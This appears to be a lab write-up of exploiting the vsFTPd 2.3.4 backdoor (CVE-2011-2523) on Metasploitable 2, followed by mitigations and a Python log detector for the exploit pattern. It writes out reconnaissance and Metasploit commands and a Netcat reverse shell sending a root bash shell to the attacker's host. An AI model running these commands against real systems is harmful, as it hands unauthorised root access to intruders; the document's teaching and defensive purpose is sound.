A step-by-step walkthrough of exploiting the vsFTPd 2.3.4 backdoor vulnerability (CVE-2011-2523) in a controlled lab environment, demonstrating reconnaissance, exploitation with Metasploit, and establishing a reverse shell.

# Penetration Testing Lab: vsFTPd 2.3.4 Backdoor Exploitation
This repository documents the process of identifying and exploiting the famous backdoor vulnerability in vsFTPd version 2.3.4 within a controlled lab environment (Metasploitable 2).
## Overview
During a routine penetration test, the vsFTPd service running on port 21 was identified as vulnerable. The service was found to be version 2.3.4, which contains a documented backdoor that allows unauthenticated remote command execution. This document details the steps taken to confirm the vulnerability and gain a reverse shell on the target system.
## Vulnerability Details
* **Service:** vsFTPd (Very Secure FTP Daemon)
* **Version:** 2.3.4
* **CVE:** CVE-2011-2523
* **Risk:** Critical (Remote Code Execution)
## Lab Setup
* **Attacker Machine:** Kali Linux
* **Target Machine:** Metasploitable 2
* **Network Configuration:** The machines were connected via a NAT and bridged network adapter, allowing the attacker to access services on the target's local IP address.
## Executive Summary
A critical backdoor was identified in the target's FTP service (vsFTPd 2.3.4). This vulnerability allows an unauthenticated attacker to gain remote command execution, ultimately leading to a full reverse shell on the system.
## Phase 1: Reconnaissance & Enumeration
The initial discovery was made using a port scan with `nmap`.
**Command:**
```bash
nmap -sS -sV -A <target-ip>
```
**Relevant Findings:**
```
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.3.4
...
```
## Phase 2: Vulnerability Identification
The version `2.3.4` is notoriously vulnerable. This was confirmed using `searchsploit`.
**Commands:**
```bash
searchsploit vsftpd 2.3.4
```
*Output revealed several public exploits, confirming the vulnerability.*
## Phase 3: Initial Exploitation Attempts
### Attempt 1: Standalone Python Exploit
A public Python exploit was mirrored and executed but failed due to compatibility issues.
**Commands:**
```bash
searchsploit -m unix/remote/49757.py
python 49757.py <target-ip>
```
*Result: Script error (incompatible with Python 3).*
### Attempt 2: Metasploit Module
The Metasploit Framework provides a reliable exploit module.
**Commands:**
```bash
msfconsole
use exploit/unix/ftp/vsftpd_234_backdoor
set RHOSTS <target-ip>
run
```
*Result: The exploit ran successfully, triggering the backdoor. However, a standard Metasploit shell was not established. The backdoor opens a root shell on port 6200.*
## Phase 4: Manual Shell Access
The Metasploit module confirmed the backdoor was present.
### Step 1: Verify Backdoor Activity
```bash
telnet <target-ip> 6200
```
*Observation: Connection established but hung, indicating a listening shell.*
### Step 2: Establish a Reverse Shell
A reverse shell was set up using Netcat for stability.
**On Attacker (Kali): Start listener.**
```bash
nc -lvnp 4444
```
**On Target (via backdoor): Execute reverse shell.**
```bash
/bin/nc <attacker-ip> 4444 -e /bin/bash
```
* `4444`: Listener port.
* `-e /bin/bash`: Executes a bash shell on the connection.
*Result: Netcat listener caught the connection, providing a root shell on the target.*
## Phase 5: Mitigation Strategies
* **Immediate Action:** Upgrade vsFTPd to the latest version available from the official repository.
* **Network Controls:** If an upgrade is not possible, restrict FTP access at the network level (firewall) to only trusted IP addresses.
* **Compromise Assessment:** A system running this vulnerable version should be considered fully compromised. A full forensic investigation and password resets are required.
* **Monitoring:** Implement IDS/IPS rules to detect and block exploit attempts against this specific vulnerability.
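As an added example (not part of the original write-up), a small Python detector for the behaviour seen in Phases 3 and 4: it reads connection-log lines and flags established connections to the backdoor port 6200, rating them high when the same source opened an FTP session on port 21 of the same host shortly before. The log format, timestamps and IP addresses are constructed assumptions.

```python
import re
from datetime import datetime, timedelta
# Constructed log format (an assumption, not the output of any real tool):
#   "<ISO timestamp> <src-ip> -> <dst-ip>:<dport> <state>"
LINE_RE = re.compile(
    r"^(?P<ts>\S+) (?P<src>[\d.]+) -> (?P<dst>[\d.]+):(?P<dport>\d+) (?P<state>\S+)$")
FTP_PORT = 21         # vsFTPd service port identified in Phase 1
BACKDOOR_PORT = 6200  # root shell port the backdoor opens (Phases 3 and 4)

def parse(line):
    """Parse one log line into a dict; return None for lines that do not match."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    return {"ts": datetime.fromisoformat(m["ts"]), "src": m["src"],
            "dst": m["dst"], "dport": int(m["dport"]), "state": m["state"]}

def find_backdoor_connections(lines, window=timedelta(seconds=60)):
    """Return (src, dst, iso_timestamp, severity) for each established
    connection to port 6200: "high" when the same source connected to
    port 21 on the same host within `window` beforehand, else "medium"."""
    last_ftp = {}  # (src, dst) -> time of the most recent port-21 connection
    hits = []
    for ev in filter(None, map(parse, lines)):
        if ev["state"] != "ESTABLISHED":
            continue  # half-open or failed attempts are ignored in this example
        key = (ev["src"], ev["dst"])
        if ev["dport"] == FTP_PORT:
            last_ftp[key] = ev["ts"]
        elif ev["dport"] == BACKDOOR_PORT:
            prior = last_ftp.get(key)
            sev = "high" if prior and ev["ts"] - prior <= window else "medium"
            hits.append((ev["src"], ev["dst"], ev["ts"].isoformat(), sev))
    return hits

# Constructed sample log: one full exploit sequence, one benign FTP user,
# one failed probe and one stray 6200 connection with no recent FTP login.
SAMPLE_LOG = [
    "2024-05-01T10:00:00 192.168.56.101 -> 192.168.56.102:21 ESTABLISHED",
    "2024-05-01T10:00:03 192.168.56.101 -> 192.168.56.102:6200 ESTABLISHED",
    "2024-05-01T10:05:00 192.168.56.50 -> 192.168.56.102:21 ESTABLISHED",
    "2024-05-01T10:05:01 192.168.56.50 -> 192.168.56.102:80 ESTABLISHED",
    "2024-05-01T11:00:00 192.168.56.77 -> 192.168.56.102:6200 SYN_SENT",
    "2024-05-01T12:00:00 192.168.56.50 -> 192.168.56.102:6200 ESTABLISHED",
    "not a connection record",
]
if __name__ == "__main__":
    for hit in find_backdoor_connections(SAMPLE_LOG):
        print("ALERT %s -> %s at %s (%s)" % hit)
```

Any established connection to 6200 on a host that should only be serving FTP deserves investigation; the high-severity hit here is the exact 21-then-6200 sequence the lab produced.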
## References
- Exploit-DB: [vsftpd 2.3.4 Backdoor Exploit](https://www.exploit-db.com/exploits/17491)
- CVE-2011-2523: [MITRE Advisory](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2523)
- NVD: [National Vulnerability Database Entry](https://nvd.nist.gov/vuln/detail/CVE-2011-2523)
## Disclaimer
This information is for **educational purposes only**. It is intended for use in authorized lab environments to understand attack methodologies and improve defensive strategies. Unauthorized testing against systems you do not own is illegal.